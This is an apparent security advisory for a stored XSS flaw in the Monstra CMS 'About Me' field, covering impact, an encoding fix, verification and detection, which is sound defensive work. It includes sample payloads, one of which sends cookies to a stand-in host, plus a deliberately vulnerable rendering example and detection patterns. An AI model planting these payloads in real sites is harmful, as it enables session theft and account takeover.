CVE-2024-36775

5.4 MEDIUM

📋 TL;DR

This stored cross-site scripting (XSS) vulnerability in Monstra CMS v3.0.4 allows any user who can edit a profile to save a malicious script in the 'About Me' field. The payload is stored with the profile, so the script runs in the browser of every other user (including administrators) who views that profile, where it can read the victim's session cookie or perform actions with the victim's privileges. All Monstra CMS v3.0.4 installations that expose user profiles are affected.

💻 Affected Systems

Products:
  • Monstra CMS
Versions: v3.0.4
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitation needs an account that can edit a profile, so exposure is greatest where self-registration is open; installations without user registration or profile editing are not exposed.

📦 What is this software?

Monstra CMS is an open-source, PHP-based flat-file content management system: content and user records are stored in files rather than in a database. Registered users get an editable profile, and the 'About Me' field of that profile is the injection point for this issue.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An administrator views the poisoned profile; the script steals the admin session cookie or issues requests with admin privileges, giving the attacker administrative access to deface the site or plant a backdoor for persistent control.

🟠 Likely Case

Attackers steal ordinary users' session cookies to hijack their accounts, perform unauthorized actions on their behalf, or redirect them to malicious sites.

🟢 If Mitigated

With the 'About Me' value HTML-encoded at the point where it is rendered, injected markup is displayed as text and never executes. An HttpOnly session cookie and a Content Security Policy reduce the impact should an encoding gap remain. Note that workarounds do not remove payloads that were stored before they were applied; existing profiles still need to be reviewed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user registration or access to an existing account that can edit its profile; no special privileges are needed beyond that. A public proof-of-concept has been published on GitHub, and the payload is a single stored field, so weaponization is trivial.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Not available

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch or later release is listed for this issue. If a newer Monstra CMS release becomes available, upgrade and re-test with the verification steps below; otherwise apply the workarounds that follow and treat them as the fix.

🔧 Temporary Workarounds

Input Validation and Output Encoding

Applies to: all platforms

The root cause is that the stored 'About Me' value is written into HTML without encoding. Fix it on the output side: wherever the field is rendered, pass it through htmlspecialchars() with ENT_QUOTES and an explicit UTF-8 charset so that <, >, quotes and & become entities and the browser displays the text instead of executing it. Server-side input filtering (length limits, stripping control characters) is useful defence in depth but does not replace output encoding, because the same value may later be rendered in another context.

Disable User Profile Editing

Applies to: all platforms

Temporarily disable the Edit Profile functionality until output encoding is in place. Remove or disable the profile-editing links and, more importantly, the server-side handler that accepts the update, since a link that is merely hidden can still be requested directly. Also review existing profiles for already-stored payloads, because disabling editing does not remove content that was injected earlier.
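The pattern behind both workarounds, as an added illustration that is not Monstra's own code: the function names, the $user array shape and the 'about_me' key are assumptions, and the payload is a constructed sample modelled on the public PoC.

```php
<?php
// Added example, not part of Monstra CMS. Illustrates the workaround pattern
// for a stored profile field. Assumes: $user is an array holding the stored
// profile, with the 'About Me' text under the (hypothetical) key 'about_me',
// and the mbstring extension is available for mb_substr().

// Vulnerable pattern: the stored field is concatenated straight into HTML,
// so "<script>...</script>" saved by the attacker reaches the browser as
// live markup for every viewer of the profile.
function render_about_me_vulnerable(array $user): string
{
    return '<div class="about">' . ($user['about_me'] ?? '') . '</div>';
}

// Hardened pattern: encode at the point of output for the HTML-body context.
// ENT_QUOTES also encodes single and double quotes, which matters when the
// same value is ever placed inside an attribute; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string.
function render_about_me(array $user): string
{
    $safe = htmlspecialchars(
        $user['about_me'] ?? '',
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return '<div class="about">' . $safe . '</div>';
}

// Defence in depth on the input side: drop control characters and cap the
// length before storing. This does NOT replace output encoding, because the
// stored text may be rendered in more than one context later.
function filter_about_me(string $raw): string
{
    $clean = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $raw) ?? '';
    return mb_substr($clean, 0, 1000);
}

// Constructed sample profile carrying a stored XSS payload (not real data).
$user = ['about_me' => filter_about_me("<script>alert('XSS')</script>")];

// First line: the browser would execute the script.
// Second line: the browser shows the tag as literal text.
echo render_about_me_vulnerable($user), PHP_EOL;
echo render_about_me($user), PHP_EOL;
```

Apply the encoding in the template or view that prints the field, not in the save path: encoding on save breaks legitimate text containing & or < when it is edited again, and leaves any value stored before the change unprotected.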

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules to block XSS payloads in user profile data; match case-insensitively on the decoded request body, since a rule for the literal string "<script>" misses mixed-case tags, event-handler attributes and URL-encoded payloads
  • Monitor stored user profile content for script tags, event handlers and javascript: URIs, and alert on detection
  • Set the HttpOnly flag on the session cookie and deploy a Content Security Policy that disallows inline scripts; neither removes the flaw, but both limit what a successful injection can do
  • Restrict or close self-registration if the site does not need it, so that only known accounts can write to profile fields

🔍 How to Verify

Check if Vulnerable:

On a test copy of the site, log in as a low-privileged account and save <script>alert('XSS')</script> in the 'About Me' field, then open that profile from a second browser session (ideally a different account) and check whether the alert fires. Viewing it from a second session confirms the payload is stored and served to other users rather than only reflected back to the author. Prefer a unique marker string in the payload over a bare alert so the test is easy to find in logs and remove afterwards.

Check Version:

Read the Monstra CMS version shown in the admin panel, or search the installation tree for the version string (for example, grep for "3.0.4" in the core PHP files) on hosts where the panel is not reachable.

Verify Fix Applied:

After implementing workarounds, repeat the test with the same payload from a second browser session and confirm that the tag is displayed as literal text (check the page source for &lt;script&gt;) and that no script executes. Also re-check any profile that was edited before the workaround, since previously stored payloads are not rewritten by an output-encoding fix.

📡 Detection & Monitoring

Log Indicators:

  • Unusual profile updates with script tags or JavaScript code in 'About Me' field

Network Indicators:

  • HTTP requests containing script payloads in profile update parameters

SIEM Query:

source="web_logs" AND (uri="/profile/edit" OR uri="/profile/update") AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")

Caveats: the URIs above are placeholders; replace them with the profile-update path of your Monstra install. Most web servers do not log POST bodies by default, so the body match only works on WAF, reverse-proxy or application logs that capture request bodies. A literal "<script>" match also misses mixed case ("<ScRiPt"), tags with attributes ("<script src=..."), event handlers ("onerror=") and URL-encoded bodies ("%3Cscript%3E"); match case-insensitively on a decoded body where the platform allows it.
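An added example (not part of Monstra CMS or the original page) of the same indicators applied as a script over exported profile values or decoded request bodies, covering the evasions a literal "<script>" match misses. The record format and every sample record are constructed; the function name is hypothetical.

```php
<?php
// Added example, not Monstra code. Scans text taken from the 'About Me'
// field (a profile export) or from a captured profile-update request body
// for stored-XSS indicators. Assumes: each record is [username, about_me].

// Returns the names of the indicators found in $text, or [] if none.
function xss_indicators(string $text): array
{
    // Request bodies arrive form-encoded, so decode once before matching;
    // stored values are passed through unchanged by this step.
    $decoded = urldecode($text);

    $patterns = [
        'script_tag'     => '/<\s*script\b/i',               // <script>, <ScRiPt src=
        'event_handler'  => '/\bon[a-z]+\s*=/i',             // onerror=, onload=
        'javascript_uri' => '/javascript\s*:/i',             // href="javascript:..."
        'data_uri_html'  => '/data\s*:\s*text\/html/i',      // data:text/html,...
        'embedding_tag'  => '/<\s*(iframe|object|embed|svg|img)\b/i',
    ];

    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample records (not real data): one benign profile and
// several payload styles, including the mixed-case and URL-encoded forms
// that a literal "<script>" match would miss.
$profiles = [
    ['alice',   'Backend developer, likes coffee.'],
    ['mallory', "<script>alert('XSS')</script>"],
    ['eve',     '<ScRiPt src=//example.invalid/x.js></ScRiPt>'],
    ['trent',   '<img src=x onerror=alert(1)>'],
    ['oscar',   '%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E'],
    ['craig',   '<a href="javascript:fetch(\'//example.invalid/?c=\'+document.cookie)">me</a>'],
];

foreach ($profiles as [$username, $aboutMe]) {
    $hits = xss_indicators($aboutMe);
    if ($hits !== []) {
        printf("ALERT user=%s indicators=%s\n", $username, implode(',', $hits));
    }
}
```

Run it against a profile export on a schedule as well as against update requests: the first catches payloads that were stored before monitoring began, the second catches new ones as they arrive. Expect some benign hits from users who legitimately write about HTML, and triage those by hand rather than loosening the patterns.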

🔗 References